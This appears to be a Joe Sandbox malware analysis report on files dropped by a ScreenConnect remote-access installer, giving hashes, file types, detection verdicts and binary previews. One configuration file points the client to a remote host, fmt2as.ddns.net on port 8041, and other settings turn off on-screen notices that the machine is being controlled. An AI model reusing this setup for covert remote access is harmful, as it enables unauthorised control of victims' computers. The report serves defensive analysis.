                                                                                                                                        SHA-512:509D9A32179A700AD76471B4CD094B8EB6D5D4AE7AD15B20FD76C482ED6D68F44693FC36BCB3999DA9346AE9E43375CD8FE02B61EDEABE4E78C4E2E44BF71D42
                                                                                                                                        Malicious:false
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                        Joe Sandbox View:
                                                                                                                                        • Filename: f53WqfzzNt.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: tiG6Ep202n.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: 6IqUjK9Koj.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: f53WqfzzNt.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: tiG6Ep202n.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: 6IqUjK9Koj.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: hB52OUUCE2.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: lCwus2wfk6.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: pbenHWj8JO.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: VVs9SAqm5N.exe, Detection: malicious, Browse
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.................. ... ....... .......................`......#.....@.................................A...O.... ..|....................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...|.... ......................@..@.reloc.......@......................@..B................u.......H...........4............_...... .........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=...*..0...........~*...%-.&~).....|...s&...%.*...(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..

                                                                                                                                        C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.dll

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):68096
                                                                                                                                        Entropy (8bit):6.06942231395039
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:1536:+A0ZscQ5V6TsQqoSD6h6+39QFVIl1zJhb8gq:p0Zy3gUOQFVQzJq
                                                                                                                                        MD5:5DB908C12D6E768081BCED0E165E36F8
                                                                                                                                        SHA1:F2D3160F15CFD0989091249A61132A369E44DEA4
                                                                                                                                        SHA-256:FD5818DCDF5FC76316B8F7F96630EC66BB1CB5B5A8127CF300E5842F2C74FFCA
                                                                                                                                        SHA-512:8400486CADB7C07C08338D8876BC14083B6F7DE8A8237F4FE866F4659139ACC0B587EB89289D281106E5BAF70187B3B5E86502A2E340113258F03994D959328D
                                                                                                                                        Malicious:false
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...nu............" ..0.............. ... ...@....... ..............................p.....@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*.~,...%-.&~+.....i...s....%.,...(...+*vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........

                                                                                                                                        C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):95512
                                                                                                                                        Entropy (8bit):6.504684691533346
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:1536:Eg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkggU0HMx790K:dhbNDxZGXfdHrX7rAc6myJkggU0HqB
                                                                                                                                        MD5:75B21D04C69128A7230A0998086B61AA
                                                                                                                                        SHA1:244BD68A722CFE41D1F515F5E40C3742BE2B3D1D
                                                                                                                                        SHA-256:F1B5C000794F046259121C63ED37F9EFF0CFE1258588ECA6FD85E16D3922767E
                                                                                                                                        SHA-512:8D51B2CD5F21C211EB8FEA4B69DC9F91DFFA7BB004D9780C701DE35EAC616E02CA30EF3882D73412F7EAB1211C5AA908338F3FA10FDF05B110F62B8ECD9D24C2
                                                                                                                                        Malicious:true
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.................................>)....@.................................p...x....`..P............L...)...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...P....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.Core.dll

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):548864
                                                                                                                                        Entropy (8bit):6.034211651049746
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12288:xC2YKhQCNc6kVTplfWL/YTHUYCBdySISYz:HhE6O7WL/EC
                                                                                                                                        MD5:14E7489FFEBBB5A2EA500F796D881AD9
                                                                                                                                        SHA1:0323EE0E1FAA4AA0E33FB6C6147290AA71637EBD
                                                                                                                                        SHA-256:A2E9752DE49D18E885CBD61B29905983D44B4BC0379A244BFABDAA3188C01F0A
                                                                                                                                        SHA-512:2110113240B7D803D8271139E0A2439DBC86AE8719ECD8B132BBDA2520F22DC3F169598C8E966AC9C0A40E617219CB8FE8AAC674904F6A1AE92D4AC1E20627CD
                                                                                                                                        Malicious:false
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............." ..0..X...........s... ........... ..............................].....@.................................as..O.......t............................r..8............................................ ............... ..H............text....W... ...X.................. ..`.rsrc...t............Z..............@..@.reloc...............^..............@..B.................s......H........C..,/..................Dr........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.

                                                                                                                                        C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.Windows.dll

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1721856
                                                                                                                                        Entropy (8bit):6.639085961200334
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24576:dx5xeYkYFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:dx5xTkYJkGYYpT0+TFiH7efP
                                                                                                                                        MD5:9AD3964BA3AD24C42C567E47F88C82B2
                                                                                                                                        SHA1:6B4B581FC4E3ECB91B24EC601DAA0594106BCC5D
                                                                                                                                        SHA-256:84A09ED81AFC5FF9A17F81763C044C82A2D9E26F852DE528112153EE9AB041D0
                                                                                                                                        SHA-512:CE557A89C0FE6DE59046116C1E262A36BBC3D561A91E44DCDA022BEF72CB75742C8B01BEDCC5B9B999E07D8DE1F94C665DD85D277E981B27B6BFEBEAF9E58097
                                                                                                                                        Malicious:false
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y............." ..0..>..........~]... ...`....... ..............................8.....@.................................+]..O....`..|............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc...|....`.......@..............@..@.reloc...............D..............@..B................_]......H.......t...d..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...

                                                                                                                                        C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsAuthenticationPackage.dll

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):260168
                                                                                                                                        Entropy (8bit):6.416438906122177
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3072:qJvChyA4m2zNGvxDd6Q6dtaVNVrlaHpFahvJ9ERnWtMG8Ff2lt9Bgcld5aaYxg:0IvxDdL6d8VNdlC3g0RCXh5D
                                                                                                                                        MD5:5ADCB5AE1A1690BE69FD22BDF3C2DB60
                                                                                                                                        SHA1:09A802B06A4387B0F13BF2CDA84F53CA5BDC3785
                                                                                                                                        SHA-256:A5B8F0070201E4F26260AF6A25941EA38BD7042AEFD48CD68B9ACF951FA99EE5
                                                                                                                                        SHA-512:812BE742F26D0C42FDDE20AB4A02F1B47389F8D1ACAA6A5BB3409BA27C64BE444AC06D4129981B48FA02D4C06B526CB5006219541B0786F8F37CF2A183A18A73
                                                                                                                                        Malicious:false
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A........................T....................V.......V.......V......................=U......=U......=U$.....=U......Rich....................PE..d.....Qf.........." ...'.^...^.......................................................(....`..........................................e.......f..P................ ......HP..........P%..p............................$..@............p...............................text...t].......^.................. ..`.rdata.......p.......b..............@..@.data....+...........d..............@....pdata... ......."...x..............@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................

                                                                                                                                        C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsBackstageShell.exe

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):61208
                                                                                                                                        Entropy (8bit):6.310126082367387
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:1536:kW/+lo6MOc8IoiKWjrNv8DtyQ4RE+TC6WAhVbb57bP8:kLlo6dccldyQGWy5s
                                                                                                                                        MD5:AFA97CAF20F3608799E670E9D6253247
                                                                                                                                        SHA1:7E410FDE0CA1350AA68EF478E48274888688F8EE
                                                                                                                                        SHA-256:E25F32BA3FA32FD0DDD99EB65B26835E30829B5E4B58573690AA717E093A5D8F
                                                                                                                                        SHA-512:FE0B378651783EF4ADD3851E12291C82EDCCDE1DBD1FA0B76D7A2C2DCD181E013B9361BBDAE4DAE946C0D45FB4BF6F75DC027F217326893C906E47041E3039B0
                                                                                                                                        Malicious:false
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....c+..........."...0.................. ........@.. ....................... .......r....@.....................................O....... ................)..............8............................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....*^.(.......a...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!...*...0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..

                                                                                                                                        C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsBackstageShell.exe.config

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):266
                                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                                        C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):602392
                                                                                                                                        Entropy (8bit):6.176232491934078
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:6144:fybAk1FVMVTZL/4TvqpU0pSdRW3akod1sI5mgve8mZXuRFtSc4q2/R4IEyxuV5AN:qbAOwJ/MvIFptJoR5NmtiFsxsFE
                                                                                                                                        MD5:1778204A8C3BC2B8E5E4194EDBAF7135
                                                                                                                                        SHA1:0203B65E92D2D1200DD695FE4C334955BEFBDDD3
                                                                                                                                        SHA-256:600CF10E27311E60D32722654EF184C031A77B5AE1F8ABAE8891732710AFEE31
                                                                                                                                        SHA-512:A902080FF8EE0D9AEFFA0B86E7980457A4E3705789529C82679766580DF0DC17535D858FBE50731E00549932F6D49011868DEE4181C6716C36379AD194B0ED69
                                                                                                                                        Malicious:false
                                                                                                                                        Yara Hits:
                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.................. ... ....@.. .......................`............@.................................M...O.... ...................)...@..........8............................................ ............... ..H............text...p.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......XJ......................$.........................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.

                                                                                                                                        C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe.config

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):266
                                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                                        C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsCredentialProvider.dll

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):842248
                                                                                                                                        Entropy (8bit):6.268561504485627
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12288:q9vy8YABMuiAoPyEIrJs7jBjaau+EAaMVtw:P8Y4MuiAoPyZrJ8jrvDVtw
                                                                                                                                        MD5:BE74AB7A848A2450A06DE33D3026F59E
                                                                                                                                        SHA1:21568DCB44DF019F9FAF049D6676A829323C601E
                                                                                                                                        SHA-256:7A80E8F654B9DDB15DDA59AC404D83DBAF4F6EAFAFA7ECBEFC55506279DE553D
                                                                                                                                        SHA-512:2643D649A642220CEEE121038FE24EA0B86305ED8232A7E5440DFFC78270E2BDA578A619A76C5BB5A5A6FE3D9093E29817C5DF6C5DD7A8FBC2832F87AA21F0CC
                                                                                                                                        Malicious:true
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}....}H..}H..}H.d~I..}H.dxIG.}H.dyI..}H..xI..}H..yI..}H..~I..}H..|H8.}H..}H..}H2.}I..}H2..I..}HRich..}H........PE..d.....Gf.........." ...'.P...........H....................................... ......q.....`......................................... ...t....................P...y.......(......,4.....T.......................(.......@............`...............................text....O.......P.................. ..`.rdata...z...`...|...T..............@..@.data....d.......0..................@....pdata...y...P...z..................@..@_RDATA...............z..............@..@.reloc..,4.......6...|..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsFileManager.exe

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):81688
                                                                                                                                        Entropy (8bit):5.8618809599146005
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:1536:Ety9l44Kzb1I5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7j27Vy:PvqukLdn2s
                                                                                                                                        MD5:1AEE526DC110E24D1399AFFCCD452AB3
                                                                                                                                        SHA1:04DB0E8772933BC57364615D0D104DC2550BD064
                                                                                                                                        SHA-256:EBD04A4540D6E76776BD58DEEA627345D0F8FBA2C04CC65BE5E979A8A67A62A1
                                                                                                                                        SHA-512:482A8EE35D53BE907BE39DBD6C46D1F45656046BACA95630D1F07AC90A66F0E61D41F940FB166677AC4D5A48CF66C28E76D89912AED3D673A80737732E863851
                                                                                                                                        Malicious:false
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....o..........."...0..@...........^... ...`....@.. .......................`.......$....@..................................^..O....`...................)...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc........`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....

                                                                                                                                        C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsFileManager.exe.config

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):266
                                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                                        C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\app.config

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1970
                                                                                                                                        Entropy (8bit):4.690426481732819
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:48:OhMOdH55AfdH85AfdHfh/dH8h/dHmh/dHH/dHS/dH0/dHjdH6dH/dHAdHKdH3dHX:o3H52H82HzHAHyHVHeHMHZHUH1HyHkHN
                                                                                                                                        MD5:2744E91BB44E575AD8E147E06F8199E3
                                                                                                                                        SHA1:6795C6B8F0F2DC6D8BD39F9CF971BAB81556B290
                                                                                                                                        SHA-256:805E6E9447A4838D874D84E6B2CDFF93723641B06726D8EE58D51E8B651CD226
                                                                                                                                        SHA-512:586EDC48A71FA17CDF092A95D27FCE2341C023B8EA4D93FA2C86CA9B3B3E056FD69BD3644EDBAD1224297BCE9646419036EA442C93778985F839E14776F51498
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:<?xml version="1.0"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ShowFeedbackSurveyForm" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>fa

                                                                                                                                        C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\system.config

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (451), with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):941
                                                                                                                                        Entropy (8bit):5.772567198240879
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24:2dL9hK6E4dl/1Gu5Y9hyN2XUMtrPt3QevH:chh7HHZ5Y/u2XPruev
                                                                                                                                        MD5:CF7081A6A703B834CD0EF188E43B33D7
                                                                                                                                        SHA1:18B3D9ADFEF643F3F0B8308C22464FFD4CABA387
                                                                                                                                        SHA-256:6122FA5E642ACB4222B755B40B394396663A00EEA27ABA38E236BC5DE07EDE64
                                                                                                                                        SHA-512:A1DE293320C5063A6AD8BFB3DF196A3C68356FEA6B2F53CF4E1D5EFCA8B88F1E0DF15CD5B3A72FB024D679C4EF2B4DBB2AFC8CFC95E2927C923CB4F32110F5CF
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ClientLaunchParametersConstraint" serializeAs="String">.. <value>?h=fmt2as.ddns.net&amp;p=8041&amp;k=BgIAAACkAABSU0ExAAgAAAEAAQBxzLpqh5koCP8CJbkkTCK5cqKcoz1K1JPBKGOoX2UntNEa0kbsjdHiHm6awC3b94Odgxip4bb3WZtV%2bJZdrEVSNJWv79YSvcWZT5y1UoPQ5ERCoZiQ9tchHj%2fdfQKGhg%2fdKH8J%2bRVDSV1rscnVOsc6DRlnVqJ%2bN3R4mz%2fwWIr4LXHocknsHhcSdO6lbQtdrPsiR%2fwv9GaUXfgI2d%2bsP4RrrBfAKpm2cyrPiMcHkEa3AHKqY3OM2oXN5%2bJcDFS6u9VisBMF5vwQJoGDG1GYkn2BCkN6fQQkj8QoHa84KuId00fcEP90jRiW7auJprFFF09vlWeqobl%2bXErI6rnKx3nZ</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

                                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1310720
                                                                                                                                        Entropy (8bit):0.40703853339446866
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:1536:fJeHJFZnnJF9U7JFCRImvqnDskXZrtlpZpaSh5hmn91nzw7LkL4b2bBbP+GCFH+R:fJyyWGWnzwHkL4WLnQnHu
                                                                                                                                        MD5:A8BF93F21FA6CEC79DC20FC2F117138E
                                                                                                                                        SHA1:126C50EF2720FAF008A18CCBB1C9F563F424304F
                                                                                                                                        SHA-256:A9FE5FFF5E081EF2952066CF1A4928475A919A48B09DA2765F3EDF8B0AAF660F
                                                                                                                                        SHA-512:919DF5275D9BFFD75FD19396235B2326FEFD1EC23956895AC66974AB1A39ED7D8C6C620C10B4CCAB69D17DA111C9E8C75655C743A00F0248A695478A8B55331C
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:.B..........@..@ /...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................%.O._..r.#.........`h.................h...............X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0xc7da9bfc, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1310720
                                                                                                                                        Entropy (8bit):0.5145200785042059
                                                                                                                                        Encrypted:false
